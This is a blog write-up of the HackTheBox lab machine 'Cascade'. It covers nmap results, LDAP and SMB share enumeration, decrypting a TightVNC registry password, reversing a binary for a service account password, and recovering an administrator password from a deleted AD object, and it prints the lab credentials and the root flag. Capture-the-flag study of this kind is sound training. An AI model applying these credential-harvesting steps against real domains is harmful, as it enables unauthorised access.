HackTheBox - Cascade

Summary

Cascade,a Windows box created by HackTheBox user VbScrub, was an overall easy-medium difficulty box.The Initial enumeration show that the box is a LDAP Server. Using Jxplorer digging in that we get credential for a user and looking in the shares we find a TightVNC registry key which contain password for user s.smith and using vncpwd we can get the password. We can winrm and get user.txt. Again looking the new open smb-shares we find a executable and a sqlite database which contain password for a service account. Reverse Engineering the binary we can get the password. login with the new creds and a mail we saw in the shares earlier we can try to retrieve the password for TempAdmin which is the password for the local admin.

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# Nmap 7.80 scan initiated Sat Mar 28 15:23:03 2020 as: nmap -v -sC -sV -oN nmap/Cascade 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.16s latency).
Not shown: 986 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-28 19:23:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -2s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-28T19:24:10
|_ start_date: 2020-03-28T19:00:42

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 28 15:26:49 2020 -- 1 IP address (1 host up) scanned in 225.63 seconds

The Initial Enumeration Shows that this is a LDAP server so lets try to run enum4linx to see the data using that we can leak the usernames

we don’t see anything else so i opened jxplorer and connected to the server looking around i saw a legacy password for r.thompson as rY4n5eva.

User

Using that password on winrm we don’t get anything so lets look at samba share and we see we can read Data share.

Looking in that we find VNCInstall.log inside Temp/s.smith which contain the registry key for TightVNC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""

“Password”=hex:6b,cf,2a,4b,6e,5a,ca,0f Googling around i found a tool vncpwd using which i cracked the password for s.smith:sT333ve2

using that we can winrm we can get a shell and get user.txt

Privilege Escalation

Enumerating we don’t see anything interesting. So I took a look at samba share

Looking inside the shares i saw a binary and a sqlite database.

Opening the CascAudit.exe in ilspy we can reverse the get the password for arksvc as w3lc0meFr31nd

Looking at the code that is a aes-cbc-128 so i opened CyberChef

Login as ArkSvc using and Enumerating i don’t see anything so going back i saw a mail in the Data share which said that TempAdmin user had same password as Administrator so i checked if i can read Deleted ADObject and we can get

1
2
3
4
5
6

> New production network will be going live on Wednesday so keep an eye out for any issues.

> We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).

> The winner of the “Best GPO” competition will be announced on Friday so get your submissions in soon.

which give us the password for admin as baCT3r1aN00dles and we can login as Administrator

and we can read root.txt f94e11622c01ceb2445b770f33684c64
and we have pwned Cascade 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/cascade/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.